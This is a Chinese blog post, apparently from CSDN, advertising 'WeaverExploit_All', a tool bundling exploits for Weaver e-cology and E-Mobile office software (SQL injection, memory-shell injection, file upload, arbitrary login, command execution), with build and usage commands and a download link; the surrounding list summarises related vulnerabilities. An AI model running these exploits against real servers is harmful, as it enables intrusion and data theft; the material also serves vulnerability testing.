泛微最近的漏洞利用工具

最新推荐文章于 2024-07-18 18:31:35 发布
最新推荐文章于 2024-07-18 18:31:35 发布
阅读量544 收藏
点赞数
分类专栏: 安全工具 文章标签: 渗透测试 网络安全 web安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46211944/article/details/132084388
版权
这篇文章介绍了WeaverExploit-All工具,它集成了多个泛微的漏洞利用功能,包括QVD-2023-5012、CVE-2023系列漏洞及内存马、文件上传、SQL注入等攻击手段。该工具仅限于测试使用,使用者需自行承担可能的后果。
摘要由CSDN通过智能技术生成

WeaverExploit_All

0x01 介绍

泛微最近的漏洞利用工具(PS:2023)

集成了QVD-2023-5012、CVE-2023-2523、CVE-2023-2648、getloginid_ofsLogin 漏洞利用

新增:WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测

0x02 编译使用

go build -o WeaverExloit-All.exe .\main.go

0x03 使用方法

默认全部poc

WeaverExloit-All.exe --target http://127.0.0.1:8080/WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc QVD-2023-5012WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2523WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2648WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc getloginid_ofsLoginWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc DeleteUserRequestInfoByXmlWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc WorkFlowServiceXmlWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc UploaderOperateWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc FileDownloadForOutDocSQLWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc E_Mobile_client  -cmd ipconfig

图片

图片

图片

图片

图片

0x04 仅供测试使用

免责声明:本工具不得用于商业用途,仅做学习交流,如用作他途造成的一切后果请自行承担!

0x05 工具下载地址泛微最近的漏洞利用工具icon-default.png?t=N6B9https://mp.weixin.qq.com/s/nKf0SJlrEZ7O7_XXYy3NWg

HACK之道
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
0xSec
03-20 1万+
泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
OA高危漏洞利用工具v1.2.0
08-02
工具使用了ExpDemo-JavaFX项目,保留了核心的数据包请求接口,使用jdk8环境开发。目前只编写了oa系列,对相关漏洞进行复现和分析,极力避免exp的误报和有效性。 截止到目前为止,已实现了用友、泛微、通达、致远...
泛微e-cology9 SQL注入漏洞复现【QVD-2023-5012】
holyxp的博客
07-22 759
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。​ 泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
「漏洞复现」泛微E-Cology WorkflowServiceXml SQL注入漏洞(QVD-2024-26136)
最新发布
qq_39894062的博客
07-18 588
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
【1day】复现泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc(QVD-2023-15672)
记录并分享学习安全的知识点..
07-12 977
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc存在SQL注入漏洞。
泛微E-Cology XXE漏洞复现(QVD-2023-16177)
0xSec
07-23 6229
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
泛微OA 最新前台未授权sql注入
swordheart的博客
07-24 1148
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology FileDownloadForOutDoc 未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。
【漏洞预警】泛微E-Cology ofsLogin任意用户登陆漏洞
做自己喜欢的事,并将其发挥到极致!
05-17 5309
泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞:泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
泛微OA8.3升级补丁
04-18
总之,泛微OA8.3升级补丁是提升泛微电子办公自动化系统性能和稳定性的关键工具,它不仅修复了已知问题,还可能带来了新的功能和更好的用户体验,尤其是对于移动设备用户来说。正确安装和应用这个补丁,可以确保泛微...
《2024攻防演练必修高危漏洞集合》
06-19
在攻防演练过程中,红队会利用各种已知和未知的漏洞来尝试突破企业的网络边界,其中高危漏洞往往成为攻击的首选目标。因此,《2024攻防演练必修高危漏洞集合》的发布对于帮助企业提前做好防御准备具有重要意义。 ##...
2023-0Day(漏洞检测Tools)V1.4 HW-漏洞挖掘-src
08-23
8月22日 漏洞检测Tools V1.0更新漏洞利用如下: 1、用友移动管理系统文件上传漏洞(YonyouMa UPload) 2、用友NC-grouptemplet接口文件上传 3、安恒明御堡垒机任意用户添加 4、致远互联FE协作办公平台文件...
2022年护网行动漏洞库
06-08
- **通达OA、泛微OA、致远OA、用友、蓝凌**: OA系统作为企业内部协作的重要工具,其安全性至关重要。这些OA系统的漏洞可能允许未经授权的数据访问或操作。 #### 五、设备漏洞 文档中列举了多个品牌和型号的设备,...
泛微最新漏洞汇总----实时更新!!!
yggcwhat
07-31 5011
泛微最新漏洞汇总
初写POC
ff1424730924的博客
07-18 231
尝试自己编写,基本样式不变,俩者都需要在同级下创建url.txt,能批量检测。初次编写,大佬路过欢迎指点,还有很多的不足,请见谅!观看大佬们做的实验尝试自己编写POC,来源。
全网最强:泛微漏洞综合检测工具
bobo_patrick的博客
03-27 1367
全网poc最全、误报最少、漏洞利用方式最多的泛微漏洞综合检测工具
0day 泛微E-Mobile 6.0 存在命令执行
失心少年
08-01 1046
泛微E-Mobile 6.0被爆存在漏洞命令执行。现已确认该漏洞可被攻击者利用,攻击者可通过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服务器的执行权限。
【1day】复现泛微OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 2567
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 4757
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
泛微oa 漏洞利用工具
09-13
根据提供的引用,目前已经实现了用友、泛微等多个OA的漏洞利用工具。其中,泛微OA漏洞利用工具的项目地址是在GitHub上,可以在https://github.com/zhaoyumi/WeaverExploit_All 找到。该工具提供了多种默认的POC,可以用于检测和利用泛微OA的漏洞。使用该工具时,可以通过命令行指定目标URL和相应的POC,如WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc QVD-2023-5012 。 该工具的编译使用方法是先使用go build命令编译,生成WeaverExloit-All.exe可执行文件。编译命令为:go build -o WeaverExloit-All.exe .\main.go。然后,可以通过命令行指定目标URL和相应的POC进行漏洞检测和利用操作。例如,WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2523可以用于检测和利用CVE-2023-2523漏洞。 总结来说,泛微OA漏洞利用工具是一个开源项目,提供了多种默认的POC,可以用于检测和利用泛微OA的漏洞。通过命令行可以指定目标URL和相应的POC进行操作。更多具体的使用方法可以参考该项目的文档或者说明。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值